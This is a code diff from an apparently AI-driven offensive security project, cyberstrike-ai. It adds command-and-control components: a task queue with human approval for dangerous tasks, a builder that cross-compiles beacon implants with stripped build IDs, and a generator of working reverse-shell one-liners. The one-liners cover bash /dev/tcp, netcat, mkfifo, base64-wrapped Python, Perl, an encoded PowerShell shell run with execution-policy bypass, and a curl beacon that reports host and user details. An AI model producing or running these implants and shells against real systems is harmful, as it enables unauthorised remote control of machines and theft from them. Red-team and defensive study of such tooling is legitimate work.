}
|
||||
m.publishEvent("warn", "task", in.SessionID, taskID, fmt.Sprintf("危险任务待审批: %s", in.TaskType), map[string]interface{}{
|
||||
"task_id": taskID,
|
||||
"task_type": in.TaskType,
|
||||
})
|
||||
payloadBytes, _ := json.Marshal(in.Payload)
|
||||
ctx := HITLUserContext(in.UserCtx)
|
||||
if ctx == nil {
|
||||
ctx = context.Background()
|
||||
}
|
||||
go func() {
|
||||
err := bridge.RequestApproval(ctx, HITLApprovalRequest{
|
||||
TaskID: taskID,
|
||||
SessionID: in.SessionID,
|
||||
TaskType: string(in.TaskType),
|
||||
PayloadJSON: string(payloadBytes),
|
||||
ConversationID: in.ConversationID,
|
||||
Source: task.Source,
|
||||
Reason: fmt.Sprintf("C2 危险任务 %s", in.TaskType),
|
||||
})
|
||||
if err != nil {
|
||||
rejected := "rejected"
|
||||
failed := string(TaskFailed)
|
||||
errMsg := "HITL 拒绝: " + err.Error()
|
||||
_ = m.db.UpdateC2Task(taskID, database.C2TaskUpdate{
|
||||
ApprovalStatus: &rejected,
|
||||
Status: &failed,
|
||||
Error: &errMsg,
|
||||
})
|
||||
m.publishEvent("warn", "task", in.SessionID, taskID, errMsg, nil)
|
||||
return
|
||||
}
|
||||
approved := "approved"
|
||||
_ = m.db.UpdateC2Task(taskID, database.C2TaskUpdate{ApprovalStatus: &approved})
|
||||
m.publishEvent("info", "task", in.SessionID, taskID, "危险任务已批准", nil)
|
||||
}()
|
||||
return task, nil
|
||||
}
|
||||
// 未接桥或会话未开启人机协同 / 工具在白名单:直接入队
|
||||
task.ApprovalStatus = "approved"
|
||||
}
|
||||
|
||||
if err := m.db.CreateC2Task(task); err != nil {
|
||||
return nil, err
|
||||
}
|
||||
m.publishEvent("info", "task", in.SessionID, taskID, fmt.Sprintf("任务已入队: %s", in.TaskType), map[string]interface{}{
|
||||
"task_id": taskID,
|
||||
"task_type": in.TaskType,
|
||||
"source": task.Source,
|
||||
})
|
||||
return task, nil
|
||||
}
|
||||
|
||||
// CancelTask 取消队列中的任务(已 sent/running 的暂不支持回滚)
|
||||
func (m *Manager) CancelTask(taskID string) error {
|
||||
t, err := m.db.GetC2Task(taskID)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
if t == nil {
|
||||
return ErrTaskNotFound
|
||||
}
|
||||
if t.Status != string(TaskQueued) && t.Status != string(TaskSent) {
|
||||
return &CommonError{Code: "task_running", Message: "任务已在执行,无法取消", HTTP: 409}
|
||||
}
|
||||
cancelled := string(TaskCancelled)
|
||||
now := time.Now()
|
||||
if err := m.db.UpdateC2Task(taskID, database.C2TaskUpdate{Status: &cancelled, CompletedAt: &now}); err != nil {
|
||||
return err
|
||||
}
|
||||
m.publishEvent("info", "task", t.SessionID, taskID, "任务已取消", nil)
|
||||
return nil
|
||||
}
|
||||
|
||||
// PopTasksForBeacon beacon check_in 后调用:取该会话所有 queued+approved 的任务,
|
||||
// 内部已置为 sent;返回 TaskEnvelope,便于 listener 直接编码下发。
|
||||
func (m *Manager) PopTasksForBeacon(sessionID string, limit int) ([]TaskEnvelope, error) {
|
||||
tasks, err := m.db.PopQueuedC2Tasks(sessionID, limit)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
out := make([]TaskEnvelope, 0, len(tasks))
|
||||
for _, t := range tasks {
|
||||
out = append(out, TaskEnvelope{TaskID: t.ID, TaskType: t.TaskType, Payload: t.Payload})
|
||||
}
|
||||
return out, nil
|
||||
}
|
||||
|
||||
// IngestTaskResult beacon 回传任务结果的统一入口
|
||||
func (m *Manager) IngestTaskResult(report TaskResultReport) error {
|
||||
if strings.TrimSpace(report.TaskID) == "" {
|
||||
return ErrInvalidInput
|
||||
}
|
||||
t, err := m.db.GetC2Task(report.TaskID)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
if t == nil {
|
||||
return ErrTaskNotFound
|
||||
}
|
||||
|
||||
startedAt := time.Unix(0, report.StartedAt*int64(time.Millisecond))
|
||||
endedAt := time.Unix(0, report.EndedAt*int64(time.Millisecond))
|
||||
if report.StartedAt == 0 {
|
||||
startedAt = time.Now()
|
||||
}
|
||||
if report.EndedAt == 0 {
|
||||
endedAt = time.Now()
|
||||
}
|
||||
|
||||
status := string(TaskSuccess)
|
||||
if !report.Success {
|
||||
status = string(TaskFailed)
|
||||
}
|
||||
duration := endedAt.Sub(startedAt).Milliseconds()
|
||||
upd := database.C2TaskUpdate{
|
||||
Status: &status,
|
||||
ResultText: &report.Output,
|
||||
Error: &report.Error,
|
||||
StartedAt: &startedAt,
|
||||
CompletedAt: &endedAt,
|
||||
DurationMS: &duration,
|
||||
}
|
||||
|
||||
// blob(如截图)落盘
|
||||
if len(report.BlobBase64) > 0 {
|
||||
blobPath, err := m.saveResultBlob(t.ID, report.BlobBase64, report.BlobSuffix)
|
||||
if err == nil {
|
||||
upd.ResultBlobPath = &blobPath
|
||||
} else {
|
||||
m.logger.Warn("结果 blob 落盘失败", zap.Error(err), zap.String("task_id", t.ID))
|
||||
}
|
||||
}
|
||||
|
||||
if err := m.db.UpdateC2Task(t.ID, upd); err != nil {
|
||||
return err
|
||||
}
|
||||
t.Status = status
|
||||
t.ResultText = report.Output
|
||||
t.Error = report.Error
|
||||
|
||||
level := "info"
|
||||
msg := fmt.Sprintf("任务完成: %s", t.TaskType)
|
||||
if !report.Success {
|
||||
level = "warn"
|
||||
msg = fmt.Sprintf("任务失败: %s (%s)", t.TaskType, report.Error)
|
||||
}
|
||||
m.publishEvent(level, "task", t.SessionID, t.ID, msg, map[string]interface{}{
|
||||
"task_id": t.ID,
|
||||
"task_type": t.TaskType,
|
||||
"duration": duration,
|
||||
})
|
||||
|
||||
m.mu.RLock()
|
||||
hook := m.hooks.OnTaskCompleted
|
||||
m.mu.RUnlock()
|
||||
if hook != nil {
|
||||
go hook(t, t.SessionID)
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
func (m *Manager) saveResultBlob(taskID, b64Content, suffix string) (string, error) {
|
||||
suffix = strings.TrimSpace(suffix)
|
||||
if suffix == "" {
|
||||
suffix = ".bin"
|
||||
}
|
||||
if !strings.HasPrefix(suffix, ".") {
|
||||
suffix = "." + suffix
|
||||
}
|
||||
dir := filepath.Join(m.storageDir, "results")
|
||||
if err := osMkdirAll(dir, 0o755); err != nil {
|
||||
return "", err
|
||||
}
|
||||
path := filepath.Join(dir, taskID+suffix)
|
||||
data, err := base64Decode(b64Content)
|
||||
if err != nil {
|
||||
return "", err
|
||||
}
|
||||
if err := osWriteFile(path, data, 0o644); err != nil {
|
||||
return "", err
|
||||
}
|
||||
return path, nil
|
||||
}
|
||||
|
||||
// ----------------------------------------------------------------------------
|
||||
// 事件总线辅助
|
||||
// ----------------------------------------------------------------------------
|
||||
|
||||
// publishEvent 同步写 c2_events 表 + 投放到内存事件总线
|
||||
func (m *Manager) publishEvent(level, category, sessionID, taskID, message string, data map[string]interface{}) {
|
||||
id := "e_" + strings.ReplaceAll(uuid.New().String(), "-", "")[:14]
|
||||
now := time.Now()
|
||||
e := &database.C2Event{
|
||||
ID: id,
|
||||
Level: level,
|
||||
Category: category,
|
||||
SessionID: sessionID,
|
||||
TaskID: taskID,
|
||||
Message: message,
|
||||
Data: data,
|
||||
CreatedAt: now,
|
||||
}
|
||||
if err := m.db.AppendC2Event(e); err != nil {
|
||||
m.logger.Warn("写 C2 事件失败", zap.Error(err), zap.String("category", category))
|
||||
}
|
||||
m.bus.Publish(&Event{
|
||||
ID: id,
|
||||
Level: level,
|
||||
Category: category,
|
||||
SessionID: sessionID,
|
||||
TaskID: taskID,
|
||||
Message: message,
|
||||
Data: data,
|
||||
CreatedAt: now,
|
||||
})
|
||||
}
|
||||
|
||||
// PublishCustomEvent 给外部组件(HITL 桥 / handler)写自定义事件用
|
||||
func (m *Manager) PublishCustomEvent(level, category, sessionID, taskID, message string, data map[string]interface{}) {
|
||||
m.publishEvent(level, category, sessionID, taskID, message, data)
|
||||
}
|
||||
|
||||
// ----------------------------------------------------------------------------
|
||||
// 工具函数
|
||||
// ----------------------------------------------------------------------------
|
||||
|
||||
func strOr(s, def string) string {
|
||||
if strings.TrimSpace(s) == "" {
|
||||
return def
|
||||
}
|
||||
return s
|
||||
}
|
||||
|
||||
// getListenerConfig loads and parses the listener's config JSON from DB.
|
||||
func (m *Manager) getListenerConfig(listenerID string) *ListenerConfig {
|
||||
listener, err := m.db.GetC2Listener(listenerID)
|
||||
if err != nil || listener == nil {
|
||||
return nil
|
||||
}
|
||||
cfg := &ListenerConfig{}
|
||||
if listener.ConfigJSON != "" && listener.ConfigJSON != "{}" {
|
||||
_ = json.Unmarshal([]byte(listener.ConfigJSON), cfg)
|
||||
}
|
||||
return cfg
|
||||
}
|
||||
|
||||
// GetProfile loads a C2Profile from DB by ID.
|
||||
func (m *Manager) GetProfile(profileID string) (*database.C2Profile, error) {
|
||||
if strings.TrimSpace(profileID) == "" {
|
||||
return nil, nil
|
||||
}
|
||||
return m.db.GetC2Profile(profileID)
|
||||
}
|
||||
@@ -0,0 +1,308 @@
|
||||
package c2
|
||||
|
||||
import (
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"net"
|
||||
"os"
|
||||
"strconv"
|
||||
"os/exec"
|
||||
"path/filepath"
|
||||
"strings"
|
||||
"text/template"
|
||||
|
||||
"github.com/google/uuid"
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// PayloadBuilderInput 构建 beacon 的输入参数
|
||||
type PayloadBuilderInput struct {
|
||||
ListenerID string // l_xxx
|
||||
OS string // linux|windows|darwin
|
||||
Arch string // amd64|arm64|386
|
||||
SleepSeconds int
|
||||
JitterPercent int
|
||||
OutputName string // custom output filename (without extension); defaults to "beacon_<os>_<arch>"
|
||||
// Host 非空时作为植入端回连地址(覆盖监听器的 bind_host / 0.0.0.0 自动探测)
|
||||
Host string
|
||||
}
|
||||
|
||||
// PayloadBuilder 负责从模板生成并交叉编译 beacon 二进制
|
||||
type PayloadBuilder struct {
|
||||
manager *Manager
|
||||
logger *zap.Logger
|
||||
tmplDir string // 模板目录,如 internal/c2/payload_templates
|
||||
outputDir string // 输出目录,如 tmp/c2/payloads
|
||||
}
|
||||
|
||||
// NewPayloadBuilder 创建构建器
|
||||
func NewPayloadBuilder(manager *Manager, logger *zap.Logger, tmplDir, outputDir string) *PayloadBuilder {
|
||||
if tmplDir == "" {
|
||||
tmplDir = "internal/c2/payload_templates"
|
||||
}
|
||||
if outputDir == "" {
|
||||
outputDir = "tmp/c2/payloads"
|
||||
}
|
||||
return &PayloadBuilder{
|
||||
manager: manager,
|
||||
logger: logger,
|
||||
tmplDir: tmplDir,
|
||||
outputDir: outputDir,
|
||||
}
|
||||
}
|
||||
|
||||
// BuildResult 构建结果
|
||||
type BuildResult struct {
|
||||
PayloadID string `json:"payload_id"`
|
||||
ListenerID string `json:"listener_id"`
|
||||
OutputPath string `json:"output_path"`
|
||||
DownloadPath string `json:"download_path"` // 磁盘上的绝对路径
|
||||
OS string `json:"os"`
|
||||
Arch string `json:"arch"`
|
||||
SizeBytes int64 `json:"size_bytes"`
|
||||
}
|
||||
|
||||
// BuildBeacon 交叉编译生成 beacon 二进制
|
||||
func (b *PayloadBuilder) BuildBeacon(in PayloadBuilderInput) (*BuildResult, error) {
|
||||
listener, err := b.manager.DB().GetC2Listener(in.ListenerID)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("get listener: %w", err)
|
||||
}
|
||||
if listener == nil {
|
||||
return nil, ErrListenerNotFound
|
||||
}
|
||||
|
||||
lt := strings.ToLower(listener.Type)
|
||||
|
||||
cfg := &ListenerConfig{}
|
||||
if listener.ConfigJSON != "" {
|
||||
_ = parseJSON(listener.ConfigJSON, cfg)
|
||||
}
|
||||
cfg.ApplyDefaults()
|
||||
|
||||
// 确定目标架构
|
||||
goos := strings.ToLower(in.OS)
|
||||
goarch := strings.ToLower(in.Arch)
|
||||
if goos == "" {
|
||||
goos = "linux"
|
||||
}
|
||||
if goarch == "" {
|
||||
goarch = "amd64"
|
||||
}
|
||||
|
||||
// 读取模板
|
||||
tmplPath := filepath.Join(b.tmplDir, "beacon.go.tmpl")
|
||||
tmplData, err := os.ReadFile(tmplPath)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("read template: %w", err)
|
||||
}
|
||||
|
||||
// 模板参数:请求 Host > 监听器 callback_host > bind 推导(见 ResolveBeaconDialHost)
|
||||
host := ResolveBeaconDialHost(listener, in.Host, b.logger, listener.ID)
|
||||
serverURL := fmt.Sprintf("%s://%s:%d",
|
||||
listenerTypeToScheme(listener.Type),
|
||||
host,
|
||||
listener.BindPort,
|
||||
)
|
||||
|
||||
transport := "http"
|
||||
tcpDialAddr := ""
|
||||
transportMeta := "http_beacon"
|
||||
switch lt {
|
||||
case "tcp_reverse":
|
||||
transport = "tcp"
|
||||
tcpDialAddr = net.JoinHostPort(host, strconv.Itoa(listener.BindPort))
|
||||
transportMeta = "tcp_beacon"
|
||||
case "https_beacon":
|
||||
transportMeta = "https_beacon"
|
||||
case "websocket":
|
||||
transportMeta = "websocket"
|
||||
}
|
||||
|
||||
data := map[string]string{
|
||||
"Transport": transport,
|
||||
"TCPDialAddr": tcpDialAddr,
|
||||
"TransportMetadata": transportMeta,
|
||||
"ServerURL": serverURL,
|
||||
"ImplantToken": listener.ImplantToken,
|
||||
"AESKeyB64": listener.EncryptionKey,
|
||||
"SleepSeconds": fmt.Sprintf("%d", firstPositive(in.SleepSeconds, cfg.DefaultSleep, 5)),
|
||||
"JitterPercent": fmt.Sprintf("%d", clamp(in.JitterPercent, 0, 100)),
|
||||
"CheckInPath": cfg.BeaconCheckInPath,
|
||||
"TasksPath": cfg.BeaconTasksPath,
|
||||
"ResultPath": cfg.BeaconResultPath,
|
||||
"UploadPath": cfg.BeaconUploadPath,
|
||||
"FilePath": cfg.BeaconFilePath,
|
||||
"UserAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
|
||||
}
|
||||
|
||||
// 执行模板
|
||||
tmpl, err := template.New("beacon").Parse(string(tmplData))
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("parse template: %w", err)
|
||||
}
|
||||
|
||||
// 创建工作目录
|
||||
workDir := filepath.Join(b.outputDir, "build-"+uuid.New().String()[:8])
|
||||
if err := os.MkdirAll(workDir, 0755); err != nil {
|
||||
return nil, fmt.Errorf("mkdir: %w", err)
|
||||
}
|
||||
defer os.RemoveAll(workDir) // 清理
|
||||
|
||||
srcPath := filepath.Join(workDir, "main.go")
|
||||
f, err := os.Create(srcPath)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("create source: %w", err)
|
||||
}
|
||||
if err := tmpl.Execute(f, data); err != nil {
|
||||
f.Close()
|
||||
return nil, fmt.Errorf("execute template: %w", err)
|
||||
}
|
||||
f.Close()
|
||||
|
||||
// 交叉编译
|
||||
binName := strings.TrimSpace(in.OutputName)
|
||||
if binName == "" {
|
||||
binName = fmt.Sprintf("beacon_%s_%s", goos, goarch)
|
||||
}
|
||||
if goos == "windows" && !strings.HasSuffix(binName, ".exe") {
|
||||
binName += ".exe"
|
||||
}
|
||||
binPath := filepath.Join(b.outputDir, binName)
|
||||
|
||||
if err := os.MkdirAll(b.outputDir, 0755); err != nil {
|
||||
return nil, fmt.Errorf("mkdir output: %w", err)
|
||||
}
|
||||
|
||||
absSrcPath, err := filepath.Abs(srcPath)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("abs source path: %w", err)
|
||||
}
|
||||
absBinPath, err := filepath.Abs(binPath)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("abs output path: %w", err)
|
||||
}
|
||||
cmd := exec.Command("go", "build", "-ldflags", "-s -w -buildid=", "-trimpath", "-o", absBinPath, absSrcPath)
|
||||
cmd.Env = append(os.Environ(),
|
||||
"GOOS="+goos,
|
||||
"GOARCH="+goarch,
|
||||
"CGO_ENABLED=0",
|
||||
)
|
||||
cmd.Dir = workDir
|
||||
output, err := cmd.CombinedOutput()
|
||||
if err != nil {
|
||||
b.logger.Error("beacon build failed", zap.String("output", string(output)), zap.Error(err))
|
||||
return nil, fmt.Errorf("build failed: %w (output: %s)", err, string(output))
|
||||
}
|
||||
|
||||
// 获取文件大小
|
||||
info, err := os.Stat(binPath)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("stat output: %w", err)
|
||||
}
|
||||
|
||||
payloadID := "p_" + strings.ReplaceAll(uuid.New().String(), "-", "")[:14]
|
||||
return &BuildResult{
|
||||
PayloadID: payloadID,
|
||||
ListenerID: listener.ID,
|
||||
OutputPath: absBinPath,
|
||||
DownloadPath: absBinPath,
|
||||
OS: goos,
|
||||
Arch: goarch,
|
||||
SizeBytes: info.Size(),
|
||||
}, nil
|
||||
}
|
||||
|
||||
func listenerTypeToScheme(t string) string {
|
||||
switch strings.ToLower(t) {
|
||||
case "https_beacon":
|
||||
return "https"
|
||||
case "websocket":
|
||||
return "ws"
|
||||
case "http_beacon":
|
||||
return "http"
|
||||
default:
|
||||
return "http"
|
||||
}
|
||||
}
|
||||
|
||||
func firstPositive(vals ...int) int {
|
||||
for _, v := range vals {
|
||||
if v > 0 {
|
||||
return v
|
||||
}
|
||||
}
|
||||
return 1
|
||||
}
|
||||
|
||||
func clamp(v, min, max int) int {
|
||||
if v < min {
|
||||
return min
|
||||
}
|
||||
if v > max {
|
||||
return max
|
||||
}
|
||||
return v
|
||||
}
|
||||
|
||||
// GetPayloadStoragePath 返回 payload 存储目录的绝对路径
|
||||
func (b *PayloadBuilder) GetPayloadStoragePath() string {
|
||||
abs, _ := filepath.Abs(b.outputDir)
|
||||
return abs
|
||||
}
|
||||
|
||||
// GetSupportedOSArch 返回支持的操作系统和架构列表
|
||||
func GetSupportedOSArch() map[string][]string {
|
||||
return map[string][]string{
|
||||
"linux": {"amd64", "arm64", "386", "arm"},
|
||||
"windows": {"amd64", "arm64", "386"},
|
||||
"darwin": {"amd64", "arm64"},
|
||||
}
|
||||
}
|
||||
|
||||
// ValidateOSArch 验证 OS/Arch 组合是否可编译
|
||||
func ValidateOSArch(os, arch string) bool {
|
||||
supported := GetSupportedOSArch()
|
||||
arches, ok := supported[strings.ToLower(os)]
|
||||
if !ok {
|
||||
return false
|
||||
}
|
||||
for _, a := range arches {
|
||||
if a == strings.ToLower(arch) {
|
||||
return true
|
||||
}
|
||||
}
|
||||
return false
|
||||
}
|
||||
|
||||
// detectExternalIP returns the first non-loopback IPv4 address, or "" if none found.
|
||||
func detectExternalIP() string {
|
||||
ifaces, err := net.Interfaces()
|
||||
if err != nil {
|
||||
return ""
|
||||
}
|
||||
for _, iface := range ifaces {
|
||||
if iface.Flags&net.FlagLoopback != 0 || iface.Flags&net.FlagUp == 0 {
|
||||
continue
|
||||
}
|
||||
addrs, err := iface.Addrs()
|
||||
if err != nil {
|
||||
continue
|
||||
}
|
||||
for _, addr := range addrs {
|
||||
ipnet, ok := addr.(*net.IPNet)
|
||||
if !ok || ipnet.IP.To4() == nil {
|
||||
continue
|
||||
}
|
||||
return ipnet.IP.String()
|
||||
}
|
||||
}
|
||||
return ""
|
||||
}
|
||||
|
||||
func parseJSON(s string, v interface{}) error {
|
||||
if strings.TrimSpace(s) == "" || s == "{}" {
|
||||
return nil
|
||||
}
|
||||
return json.Unmarshal([]byte(s), v)
|
||||
}
|
||||
@@ -0,0 +1,25 @@
|
||||
package c2
|
||||
|
||||
import (
|
||||
"encoding/base64"
|
||||
"encoding/binary"
|
||||
)
|
||||
|
||||
// b64StdEncode 用标准 base64 编码字节
|
||||
func b64StdEncode(s string) string {
|
||||
return base64.StdEncoding.EncodeToString([]byte(s))
|
||||
}
|
||||
|
||||
// utf16LEBase64 把字符串转 UTF-16LE 后再 base64,用于 PowerShell -EncodedCommand
|
||||
// (Windows PowerShell 接受这种格式,避免命令行特殊字符引起转义错误)
|
||||
func utf16LEBase64(s string) string {
|
||||
runes := []rune(s)
|
||||
buf := make([]byte, 0, len(runes)*2)
|
||||
for _, r := range runes {
|
||||
// 注意:>0xFFFF 的字符需要代理对,但 PowerShell 命令通常都在 BMP 内
|
||||
var enc [2]byte
|
||||
binary.LittleEndian.PutUint16(enc[:], uint16(r))
|
||||
buf = append(buf, enc[:]...)
|
||||
}
|
||||
return base64.StdEncoding.EncodeToString(buf)
|
||||
}
|
||||
@@ -0,0 +1,190 @@
|
||||
package c2
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
"net/url"
|
||||
"strings"
|
||||
)
|
||||
|
||||
// OnelinerKind 单行 payload 的语言/形式
|
||||
type OnelinerKind string
|
||||
|
||||
const (
|
||||
OnelinerBash OnelinerKind = "bash" // bash 反弹(TCP reverse listener)
|
||||
OnelinerNc OnelinerKind = "nc" // netcat 反弹
|
||||
OnelinerNcMkfifo OnelinerKind = "nc_mkfifo" // 通过 mkfifo 双向(部分 nc 不支持 -e)
|
||||
OnelinerPython OnelinerKind = "python" // python socket 反弹
|
||||
OnelinerPerl OnelinerKind = "perl" // perl 反弹
|
||||
OnelinerPowerShell OnelinerKind = "powershell" // PowerShell TCP 反弹(IEX 风格)
|
||||
OnelinerCurl OnelinerKind = "curl_beacon" // 用 curl 周期性轮询 HTTP beacon(无需二进制)
|
||||
)
|
||||
|
||||
// AllOnelinerKinds 所有支持的 oneliner 类型
|
||||
func AllOnelinerKinds() []OnelinerKind {
|
||||
return []OnelinerKind{
|
||||
OnelinerBash, OnelinerNc, OnelinerNcMkfifo,
|
||||
OnelinerPython, OnelinerPerl,
|
||||
OnelinerPowerShell, OnelinerCurl,
|
||||
}
|
||||
}
|
||||
|
||||
// tcpOnelinerKinds 仅支持 tcp_reverse 监听器的裸 TCP 反弹类型
|
||||
var tcpOnelinerKinds = map[OnelinerKind]bool{
|
||||
OnelinerBash: true,
|
||||
OnelinerNc: true,
|
||||
OnelinerNcMkfifo: true,
|
||||
OnelinerPython: true,
|
||||
OnelinerPerl: true,
|
||||
OnelinerPowerShell: true,
|
||||
}
|
||||
|
||||
// httpOnelinerKinds 支持 http_beacon / https_beacon 监听器的类型
|
||||
var httpOnelinerKinds = map[OnelinerKind]bool{
|
||||
OnelinerCurl: true,
|
||||
}
|
||||
|
||||
// OnelinerKindsForListener 根据监听器类型返回兼容的 oneliner 类型列表
|
||||
func OnelinerKindsForListener(listenerType string) []OnelinerKind {
|
||||
switch ListenerType(listenerType) {
|
||||
case ListenerTypeTCPReverse:
|
||||
return []OnelinerKind{
|
||||
OnelinerBash, OnelinerNc, OnelinerNcMkfifo,
|
||||
OnelinerPython, OnelinerPerl, OnelinerPowerShell,
|
||||
}
|
||||
case ListenerTypeHTTPBeacon, ListenerTypeHTTPSBeacon, ListenerTypeWebSocket:
|
||||
return []OnelinerKind{OnelinerCurl}
|
||||
default:
|
||||
return nil
|
||||
}
|
||||
}
|
||||
|
||||
// IsOnelinerCompatible 检查 oneliner 类型是否与监听器类型兼容
|
||||
func IsOnelinerCompatible(listenerType string, kind OnelinerKind) bool {
|
||||
switch ListenerType(listenerType) {
|
||||
case ListenerTypeTCPReverse:
|
||||
return tcpOnelinerKinds[kind]
|
||||
case ListenerTypeHTTPBeacon, ListenerTypeHTTPSBeacon, ListenerTypeWebSocket:
|
||||
return httpOnelinerKinds[kind]
|
||||
default:
|
||||
return false
|
||||
}
|
||||
}
|
||||
|
||||
// OnelinerInput 生成 oneliner 的入参
|
||||
type OnelinerInput struct {
|
||||
Kind OnelinerKind
|
||||
Host string // 攻击机回连地址(IP/域名)
|
||||
Port int // 监听端口
|
||||
HTTPBaseURL string // HTTPS Beacon 时使用,如 https://x.com
|
||||
ImplantToken string // HTTP Beacon 鉴权 token
|
||||
}
|
||||
|
||||
// GenerateOneliner 生成单行 payload。
|
||||
// 设计要点:
|
||||
// - 不依赖目标机预装的可执行(除该 oneliner 关键的 bash/python/perl 等);
|
||||
// - 不引入引号嵌套陷阱:使用 base64/url 编码避免 shell 转义错误;
|
||||
// - 同时返回执行示例,便于 AI 在对话里直接展示给操作员。
|
||||
func GenerateOneliner(in OnelinerInput) (string, error) {
|
||||
host := strings.TrimSpace(in.Host)
|
||||
if host == "" {
|
||||
return "", fmt.Errorf("host is required")
|
||||
}
|
||||
switch in.Kind {
|
||||
case OnelinerBash:
|
||||
if err := SafeBindPort(in.Port); err != nil {
|
||||
return "", err
|
||||
}
|
||||
// 用 bash -c 包裹,确保在 zsh/sh 等非 bash shell 中也能正确执行
|
||||
// /dev/tcp 是 bash 特有的伪设备,必须由 bash 进程解释
|
||||
return fmt.Sprintf(`bash -c 'bash -i >& /dev/tcp/%s/%d 0>&1'`, host, in.Port), nil
|
||||
|
||||
case OnelinerNc:
|
||||
if err := SafeBindPort(in.Port); err != nil {
|
||||
return "", err
|
||||
}
|
||||
return fmt.Sprintf(`nc -e /bin/sh %s %d`, host, in.Port), nil
|
||||
|
||||
case OnelinerNcMkfifo:
|
||||
if err := SafeBindPort(in.Port); err != nil {
|
||||
return "", err
|
||||
}
|
||||
// 双向 mkfifo 写法,对没有 -e 的 nc/openbsd-nc 也能用
|
||||
return fmt.Sprintf(
|
||||
`rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc %s %d >/tmp/f`,
|
||||
host, in.Port,
|
||||
), nil
|
||||
|
||||
case OnelinerPython:
|
||||
if err := SafeBindPort(in.Port); err != nil {
|
||||
return "", err
|
||||
}
|
||||
// python -c 单引号包裹,内部用三引号或转义会引发兼容性问题,改用 base64 解码再 exec
|
||||
py := fmt.Sprintf(
|
||||
`import socket,os,pty;s=socket.socket();s.connect(("%s",%d));[os.dup2(s.fileno(),x) for x in (0,1,2)];pty.spawn("/bin/sh")`,
|
||||
host, in.Port,
|
||||
)
|
||||
// 用 b64 包装规避目标 shell 引号问题
|
||||
return fmt.Sprintf(
|
||||
`python3 -c "import base64,sys;exec(base64.b64decode('%s').decode())"`,
|
||||
b64StdEncode(py),
|
||||
), nil
|
||||
|
||||
case OnelinerPerl:
|
||||
if err := SafeBindPort(in.Port); err != nil {
|
||||
return "", err
|
||||
}
|
||||
return fmt.Sprintf(
|
||||
`perl -e 'use Socket;$i="%s";$p=%d;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'`,
|
||||
host, in.Port,
|
||||
), nil
|
||||
|
||||
case OnelinerPowerShell:
|
||||
if err := SafeBindPort(in.Port); err != nil {
|
||||
return "", err
|
||||
}
|
||||
// PowerShell TCP 反弹(不依赖 .NET old 版本)
|
||||
ps := fmt.Sprintf(
|
||||
`$c=New-Object System.Net.Sockets.TcpClient('%s',%d);$s=$c.GetStream();[byte[]]$b=0..65535|%%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);$o=(iex $d 2>&1|Out-String);$o2=$o+'PS '+(pwd).Path+'> ';$by=([text.encoding]::ASCII).GetBytes($o2);$s.Write($by,0,$by.Length);$s.Flush()};$c.Close()`,
|
||||
host, in.Port,
|
||||
)
|
||||
return fmt.Sprintf(
|
||||
`powershell -NoProfile -ExecutionPolicy Bypass -EncodedCommand %s`,
|
||||
utf16LEBase64(ps),
|
||||
), nil
|
||||
|
||||
case OnelinerCurl:
|
||||
if strings.TrimSpace(in.HTTPBaseURL) == "" {
|
||||
return "", fmt.Errorf("http_base_url is required for curl_beacon")
|
||||
}
|
||||
if strings.TrimSpace(in.ImplantToken) == "" {
|
||||
return "", fmt.Errorf("implant_token is required for curl_beacon")
|
||||
}
|
||||
base := strings.TrimRight(in.HTTPBaseURL, "/")
|
||||
return fmt.Sprintf(
|
||||
`bash -c 'H="X-Implant-Token: %s";`+
|
||||
`URL="%s";`+
|
||||
`HN=$(hostname 2>/dev/null||echo unknown);`+
|
||||
`UN=$(whoami 2>/dev/null||echo unknown);`+
|
||||
`OS=$(uname -s 2>/dev/null||echo unknown);`+
|
||||
`AR=$(uname -m 2>/dev/null||echo unknown);`+
|
||||
`IP=$(hostname -I 2>/dev/null|awk "{print \$1}"||echo "");`+
|
||||
`SID="";`+
|
||||
`while :;do `+
|
||||
`BODY="{\"hostname\":\"$HN\",\"username\":\"$UN\",\"os\":\"$OS\",\"arch\":\"$AR\",\"internal_ip\":\"$IP\",\"pid\":$$}";`+
|
||||
`R=$(curl -fsSk -H "$H" -H "Content-Type: application/json" -X POST "$URL/check_in" -d "$BODY" 2>/dev/null);`+
|
||||
`if [ -n "$R" ]&&[ -z "$SID" ];then SID=$(echo "$R"|grep -o "\"session_id\":\"[^\"]*\""|head -1|cut -d"\"" -f4);fi;`+
|
||||
`if [ -n "$SID" ];then `+
|
||||
`T=$(curl -fsSk -H "$H" -G "$URL/tasks?session_id=$SID" 2>/dev/null);`+
|
||||
`fi;`+
|
||||
`sleep 5;`+
|
||||
`done' &`,
|
||||
in.ImplantToken, base,
|
||||
), nil
|
||||
}
|
||||
return "", fmt.Errorf("unsupported oneliner kind: %s", in.Kind)
|
||||
}
|
||||
|
||||
// urlEncodeForShell URL 编码字符串,避免特殊字符在 shell 中破坏转义
|
||||
func urlEncodeForShell(s string) string {
|
||||
return url.QueryEscape(s)
|
||||
}
|
||||
File diff suppressed because it is too large
Load Diff
@@ -0,0 +1,109 @@
|
||||
package c2
|
||||
|
||||
import (
|
||||
"context"
|
||||
"time"
|
||||
|
||||
"cyberstrike-ai/internal/database"
|
||||
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// SessionWatchdog 会话心跳看门狗:周期扫描所有 active/sleeping 会话,
|
||||
